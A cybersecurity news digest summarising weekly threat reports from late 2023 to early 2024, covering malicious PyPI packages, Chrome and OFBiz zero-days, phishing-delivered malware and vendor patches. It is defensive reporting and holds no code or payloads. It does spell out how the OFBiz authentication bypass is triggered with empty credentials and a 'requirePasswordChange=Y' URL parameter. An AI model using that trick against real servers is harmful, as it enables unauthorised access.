12/27/2023-01/04/2024 3 Malicious PyPI Packages, Privilege Escalation Flaw Impacting Kubernetes Service, Critical Zero-Day in Apache OfBiz ERP System And More.

1. Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. These packages, upon initial use, deploy a CoinMiner executable on Linux devices. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script (“unmi.sh”) that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process continues to run after exiting the session. Echoing the approach of the earlier ‘culturestreak’ package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL.

2. Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out “data theft, deploy malicious pods, and disrupt the cluster’s operations.” A key prerequisite to successfully exploiting the vulnerability hinges on an attacker having already compromised a FluentBit container by some other initial access methods, such as via a remote code execution flaw. A threat actor could use this access to gain privileged access to a Kubernetes cluster that has ASM enabled and then subsequently use ASM’s service account token to escalate their privileges by creating a new pod with cluster-admin privileges. By way of fixes, Google has removed Fluent Bit’s access to the service account tokens and re-architected the functionality of ASM to remove excessive role-based access control (RBAC) permissions.

3. Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack

A new zero-day security flaw has been discovered in Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month. CVE-2023-51467 could be triggered using empty and invalid USERNAME and PASSWORD parameters in an HTTP request to return an authentication success message, effectively circumventing the protection and enabling a threat actor to access otherwise unauthorized internal resources. The attack hinges on the fact that the parameter “requirePasswordChange” is set to “Y” (i.e., yes) in the URL, causing the authentication to be trivially bypassed regardless of the values passed in the username and password fields. It is imperative that users move quickly to secure their Apache OFBiz instances against the two vulnerabilities.

4. CISA warns of actively exploited bugs in Chrome and Excel parsing library

The first issue that CISA added to its Known Exploited Vulnerabilities (KEV) is CVE-2023-7101, a remote code execution vulnerability that affects versions 0.65 and older of the Spreadsheet::ParseExcel library. Spreadsheet::ParseExcel contains a remote code execution vulnerability due to passing unvalidated input from a file into a string-type “eval.” Specifically, the issue stems from the evaluation of Number format strings within the Excel parsing logic. One product using the open-source library is Barracuda ESG (Email Security Gateway), which has been targeted in late December by Chinese hackers who exploited the CVE-2023-7101 in Spreadsheet::ParseExcel to compromise appliances. The latest actively exploited vulnerability added to KEV is CVE-2023-7024, a heap buffer overflow issue in WebRTC in Google Chrome web browser. Google Chromium WebRTC contains a heap buffer overflow vulnerability that allows an attacker to cause crashes or code execution. This vulnerability could impact web browsers using WebRTC, including but not limited to Google Chrome. The flaw was discovered by Google’s Threat Analysis Group (TAG) and received a fix via an emergency update on December 20, in versions 120.0.6099.129/130 for Windows and 120.0.6099.129 for Mac and Linux.

5. ‘everything’ blocks devs from removing their own npm packages

Over the holidays, the npm package registry was flooded with more than 3,000 packages, including one called “everything,” and others named a variation of the word. Installing everything could have just caused your computer to potentially fall short of storage space and slow down, but the package’s mere existence on npmjs.com prevents authors—unrelated to this package whatsoever, from unpublishing their packages from the world’s largest JavaScript software registry. The “everything” package has just 5 sub-packages, published under the “@everything-registry” scope, listed as its dependencies.  These 5 packages, however, gradually manage to pull in every single package present on the entire registry as a dependency. For example, “everything” pulls in “@everything-registry/chunk-2,” which may further attempt to pull in several other packages by the same author, such as “@everything-registry/sub-chunk-1623.” Each of these sub-packages (or “chunks” as the author calls them), ultimately includes about 800 npm projects as their dependency.  The problem is, since ‘everything’ relies on every package (including yours), your package gets stuck, and there’s some unknown package preventing you from removing it.

12/20/2023-12/27/2023 New Chrome Zero-Day Vulnerability, Ivanti Releases Patches, Poorly Secured Linux SSH Servers Under Attack And More.

1. Urgent: New Chrome Zero-Day Vulnerability Exploited in the Wild – Update ASAP

Google has released security updates for Chrome, addressing a high-severity zero-day flaw (CVE-2023-7024) in the WebRTC framework. The heap-based buffer overflow bug could lead to program crashes or arbitrary code execution. Google confirms the exploit’s existence in the wild but provides limited details to prevent further abuse. Since the year began, this marks the eighth actively exploited zero-day in Chrome, adding to a total of 26,447 disclosed vulnerabilities in 2023. It remains unclear if the flaw affects browsers like Mozilla Firefox and Apple Safari, both supporting WebRTC. Users are urged to update Chrome to version 120.0.6099.129/130 (Windows) or 120.0.6099.129 (macOS and Linux) for enhanced security. 

2. Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware

Attackers are exploiting an old Microsoft Office vulnerability (CVE-2017-11882) in phishing campaigns to distribute Agent Tesla malware, warns Zscaler ThreatLabz. Using decoy Excel documents in invoice-themed messages, the attackers trick users into activating the memory corruption flaw, enabling code execution with user privileges. Once a user opens the malicious attachment, the Excel file communicates with a malicious destination, downloading additional files without user interaction. The malware employs an obfuscated Visual Basic Script, initiating the download of a JPG file embedded with a Base64-encoded DLL file. The DLL is then injected into RegAsm.exe to launch Agent Tesla, an advanced keylogger and remote access trojan.
This underscores the importance of organizations staying updated on evolving cyber threats to protect their digital landscape.
 

3. Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware

A phishing campaign employs decoy Microsoft Word documents to deliver Nim programming language-based backdoor malware, posing a challenge for security researchers due to the uncommon language. Netskope researchers detail the attack chain, initiated by a phishing email with a Word document attachment, impersonating a Nepali government official. Once macros are enabled, the Nim malware is deployed, establishing connections with remote servers mimicking Nepali government domains. Nim’s cross-compilation features allow attackers to create a single variant targeting different platforms. Concurrently, threat actors experiment with new malware strains, while phishing campaigns distribute known malware like DarkGate and NetSupport RAT via email and compromised websites. Proofpoint identifies at least 20 DarkGate campaigns switching to NetSupport RAT, exploiting a Windows SmartScreen bypass vulnerability as a zero-day a month before its public disclosure.

4. Ivanti Releases Patches For 13 Critical Avalanche RCE flaws

Ivanti has issued critical security updates for its Avalanche enterprise mobile device management (MDM) solution, addressing 13 vulnerabilities. The flaws, including stack or heap-based buffer overflows, expose over 100,000 managed mobile devices to remote code execution by unauthenticated attackers. Exploitation occurs via specially crafted data packets sent to the Mobile Device Server. Ivanti urges users to update to Avalanche 6.4.2, as all supported versions (6.3.1 and above) are vulnerable. The update also addresses eight medium- and high-severity bugs, guarding against denial of service, remote code execution, and server-side request forgery attacks. This follows Ivanti’s previous fix for critical buffer overflows in August and the chaining of MobileIron Core zero-days by threat actors in September.

5. Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining

Poorly secured Linux SSH servers face increased threats from malicious actors aiming to install port scanners and dictionary attack tools. The goal is to compromise vulnerable servers for cryptocurrency mining and distributed denial-of-service (DDoS) attacks. AhnLab’s Security Emergency Response Center (ASEC) reported that threat actors may sell breached IP and account credentials on the dark web. The attacks involve guessing SSH credentials through dictionary attacks, followed by deploying malware, including scanners, to identify other susceptible systems. The scanners focus on systems with active port 22 (SSH) and propagate infections through dictionary attacks. Notably, the attackers execute commands like “grep -c ^processor /proc/cpuinfo” to determine CPU cores. Believed to be created by PRG old Team, these tools have been active since 2021. To mitigate risks, users are advised to use strong, periodically rotated passwords and keep systems updated.

12/13/2023-12/20/2023 Oracle WebLogic Server Vulnerability, Security Vulnerabilities in pfSense Firewall Software, 116 Malware Packages Found on PyPI Repository And More.

1. 8220 Gang Exploiting Oracle WebLogic Server Vulnerability to Spread Malware

The threat actors associated with the 8220 Gang have been observed exploiting a high-severity flaw in Oracle WebLogic Server to propagate their malware. The security shortcoming is CVE-2020-14883 (CVSS score: 7.2), a remote code execution bug that could be exploited by authenticated attackers to take over susceptible servers. This vulnerability allows remote authenticated attackers to execute code using a gadget chain and is commonly chained with CVE-2020-14882 (an authentication bypass vulnerability also affecting Oracle Weblogic Server) or the use of leaked, stolen, or weak credentials. The 8220 Gang has a history of leveraging known security flaws to distribute cryptojacking malware. Earlier this May, the group was spotted utilizing another shortcoming in Oracle WebLogic servers (CVE-2017-3506, CVSS score: 7.4) to rope the devices into a crypto mining botnet.

2. New Security Vulnerabilities Uncovered in pfSense Firewall Software – Patch Now

Multiple security vulnerabilities have been discovered in the open-source Netgate pfSense firewall solution called pfSense that could be chained by an attacker to execute arbitrary commands on susceptible appliances. The issues relate to two reflected cross-site scripting (XSS) bugs and one command injection flaw. Potential attackers could have used the discovered vulnerabilities to spy on traffic or attack services inside the local network. A brief description of the flaws is given below: 

• CVE-2023-42325 (CVSS score: 5.4) – An XSS vulnerability that allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.
• CVE-2023-42327 (CVSS score: 5.4) – An XSS vulnerability that allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.
• CVE-2023-42326 (CVSS score: 8.8) – A lack of validation that allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

Reflected XSS attacksoccur when an attacker delivers a malicious script to a vulnerable web application, which is then returned in the HTTP response and executed on the victim’s web browser. As a result, attacks of this kind are triggered by means of crafted links embedded in phishing messages or a third-party website, for example, in a comment section or in the form of links shared on social media posts. In the case of pfSense, the threat actor can perform actions in the firewall with the victim’s permissions.

3. 116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems

Cybersecurity researchers uncovered 116 malicious packages on the Python Package Index (PyPI), aiming to infect Windows and Linux systems with a custom backdoor. ESET researchers identified these packages, estimating over 10,000 downloads since May 2023. The attackers employ various techniques, including embedding malicious code via test.py and obfuscated forms in init.py and setup.py files. The end goal is compromising hosts with malware, particularly a backdoor for remote command execution, data exfiltration, and screenshots. The backdoor is implemented in Python for Windows and Go for Linux. Alternatively, attack chains may deploy W4SP Stealer or a clipper malware altering clipboard activity to replace wallet addresses. This incident joins a series of compromised Python packages used for supply chain attacks, such as libraries distributing Sordeal Stealer in May 2023 and BlazeStealer last month. The researchers advise Python developers to thoroughly vet downloaded code for these techniques. This discovery follows npm packages targeting a financial institution in an advanced adversary simulation exercise. The module names remain undisclosed for security reasons.

4. Microsoft Discovers Critical RCE Flaw In Perforce Helix Core Server

 Microsoft has uncovered four vulnerabilities, including a critical one, in the widely used Perforce Helix Core Server, a source code management platform prevalent in gaming, government, military, and technology sectors. Discovered during a security review by Microsoft analysts, the flaws pose risks of denial of service (DoS) and arbitrary remote code execution as LocalSystem by unauthenticated attackers. While there’s no observed exploitation in the wild, users are urged to upgrade to version 2023.1/2513900 released on November 7, 2023. The most severe flaw, CVE-2023-45849, allows unauthenticated attackers to execute code as LocalSystem, potentially leading to system control. The other three vulnerabilities also involve DoS risks. Microsoft recommends regular updates, access restrictions, TLS certificates, logging, crash alerts, and network segmentation to enhance protection. For details, consult the official security guide.

5. Google Using Clang Sanitizers to Protect Android Against Cellular Baseband Vulnerabilities

Google is emphasizing the role of Clang sanitizers, specifically IntSan and BoundSan, in securing the Android OS cellular baseband against vulnerabilities. These are part of UndefinedBehaviorSanitizer, designed to detect undefined behavior during program execution. While incurring performance overhead, Google activated these sanitizers in critical areas, covering functions parsing messages, libraries handling complex formats, and network stacks for 2G to 5G. Although beneficial, sanitizers don’t address all vulnerability classes, necessitating a transition to memory-safe languages like Rust. In October 2023, Google rewrote Android Virtualization Framework’s firmware in Rust for a memory-safe foundation. As the high-level OS becomes more resilient, Google anticipates increased attention on lower-level components like the baseband, emphasizing the importance of modern toolchains and exploit mitigation technologies